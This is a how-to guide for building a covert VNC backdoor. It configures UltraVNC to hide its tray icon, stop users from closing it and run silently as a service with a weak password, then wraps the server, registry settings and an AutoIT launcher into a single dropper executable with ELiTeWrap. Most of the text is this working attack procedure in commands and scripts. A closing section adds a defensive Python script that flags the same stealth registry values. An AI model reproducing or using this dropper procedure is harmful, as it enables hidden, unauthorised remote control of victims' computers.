
Creating a VNC Backdoor

• Download UltraVNC 1.0.2
  o http://www.uvnc.com

• Install UltraVNC
  o Install Path C:\VNC
  o Check “Register UltraVNC Server as a Service”
  o Uncheck “UltraVNC Mirror Driver”
  o Uncheck “DSM Encryption Plugin”
  o Uncheck “UltraVNC Repeater”

• Setup UltraVNC Registry Settings
  o Start Menu → UltraVNC → UltraVNC Server
  o Change the main port to 9090
  o Check “DisableTrayIcon”
  o Check “Disable clients options in tray icon menu”
  o Check “Forbid the user to close down WinVNC”
  o Check “Disable Local Inputs”
  o Set the password as “password”
  o Click “OK” when done

• Package Up the Payload
  o Open up a command prompt
    ▪ cd \VNC
    ▪ md backdoor
    ▪ copy winvnc.exe backdoor
    ▪ copy vnchooks.dll backdoor
    ▪ cd backdoor
    ▪ regedit /E vnc.reg "HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC"
    ▪ regedit /E vnc2.reg "HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC\Default"
    ▪ notepad vnc.reg
      • Change the first line to
        o REGEDIT4
      • Add the following lines below the [HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC\DEFAULT]
        o "BeepConnect"=dword:00000000
        o "BeepDisconnect"=dword:00000000
    ▪ notepad vnc2.reg
      • Copy the contents under [HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC\DEFAULT]
        o Paste the contents in vnc.reg
  o AutoIT Scripting
    ▪ Download AutoIT & install
      • http://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe
    ▪ Open a new AutoIT script called vncbd.au3
      • Type the following contents
        o ShellExecute("regedit.exe", "/S vnc.reg", "", "")
        o ShellExecute("winvnc.exe", "-reinstall", "", "")
        o Sleep(2000)
        o ShellExecute("net.exe", "start winvnc", "", "")
      • Save and compile the files
  o Download ELiTeWrap
    ▪ http://homepage.ntlworld.com/chawmp/elitewrap/
    ▪ Extract the contents into C:\VNC\backdoor
    ▪ Create an ELiTeWrap script
      • notepad vnc_backdoor.ews
      • Type the following
          vncbackdoor.exe
          n
          winvnc.exe
          1
          vnchooks.dll
          1
          vnc.reg
          1
          vncbd.exe
          3
          ~
      • Save the file
    ▪ Package the files
      • In the command prompt
        o elitewrap.exe vnc.backdoor.ews
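The registry values this procedure sets are a usable detection signal on the defending side. The following is an added example, not part of the original page: it scans a REGEDIT4-style export for the value names the page mentions under the ORL\WinVNC key. The function name and the sample export are constructed here, and it is an assumption that "DisableTrayIcon" is stored as a DWORD under the same key.

```python
import re

# Value names come from the page; each predicate matches the setting the
# page's procedure applies (icon hidden, connection beeps silenced).
# Assumption: DisableTrayIcon is stored as a DWORD like the two Beep values.
STEALTH_VALUES = {
    "disabletrayicon": lambda v: v != 0,
    "beepconnect": lambda v: v == 0,
    "beepdisconnect": lambda v: v == 0,
}
KEY_PREFIX = r"hkey_local_machine\software\orl\winvnc"
SECTION_RE = re.compile(r"^\[(.+)\]$")
DWORD_RE = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{8})$')


def find_stealth_settings(reg_text):
    """Return sorted (key, value_name, data) tuples for stealth-related DWORDs."""
    findings = []
    current_key = None
    for raw in reg_text.splitlines():
        line = raw.strip()
        section = SECTION_RE.match(line)
        if section:
            current_key = section.group(1)
            continue
        # Ignore values outside the WinVNC key tree (case-insensitive match).
        if current_key is None or not current_key.lower().startswith(KEY_PREFIX):
            continue
        value = DWORD_RE.match(line)
        if not value:
            continue
        name, data = value.group(1), int(value.group(2), 16)
        check = STEALTH_VALUES.get(name.lower())
        if check and check(data):
            findings.append((current_key, name, data))
    return sorted(findings)


# Constructed sample export, not taken from a real host.
SAMPLE_EXPORT = r'''REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC]
"DisableTrayIcon"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC\Default]
"BeepConnect"=dword:00000000
"BeepDisconnect"=dword:00000001
'''

if __name__ == "__main__":
    for key, name, data in find_stealth_settings(SAMPLE_EXPORT):
        print(f"{key}: {name}={data}")
```

A hit is a prompt for review, not proof of compromise: an administrator may have applied the same settings deliberately.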

